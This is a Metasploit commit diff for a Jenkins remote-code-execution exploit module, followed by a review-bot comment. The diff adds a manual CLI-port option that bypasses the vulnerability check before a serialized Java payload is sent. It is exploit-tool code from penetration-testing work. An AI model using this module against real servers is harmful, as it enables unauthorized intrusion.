Resolve #6546, support manual config for X-Jenkins-CLI-Port

Resolve #6546
bug/bundler_fix
wchen-r7 2016-02-08 18:16:48 -06:00
parent be8d6df093
commit d60dcf72f9
1 changed files with 10 additions and 2 deletions


@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
register_advanced_options([
OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
], self.class)
end
def cli_port
@jenkins_cli_port || datastore['XJenkinsCliPort']
end
def exploit
unless vulnerable?
unless cli_port || vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
socket = connect(true, {'RPORT' => cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))
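Review bot: In `cli_port` (first hunk) a previously stored `@jenkins_cli_port` wins over the operator's `XJenkinsCliPort`, so the manual value is silently dropped whenever the instance variable is already set; where it gets assigned is outside these hunks, presumably in `vulnerable?`. If the advanced option is meant as an override, the order should be `datastore['XJenkinsCliPort'] || @jenkins_cli_port`. Separately, `unless cli_port || vulnerable?` skips the target check entirely once a port is known, and nothing records that the run went ahead against an unverified service. A line such as `print_status("#{peer} - XJenkinsCliPort set to #{cli_port}, skipping vulnerability check")` before `invoke_remote_method` would keep the engagement log auditable. The option description should also say that the check is bypassed, not only that TARGETURI is ignored.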